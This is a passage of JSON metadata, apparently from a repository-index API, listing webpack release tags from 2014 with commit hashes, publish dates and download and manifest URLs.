/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_u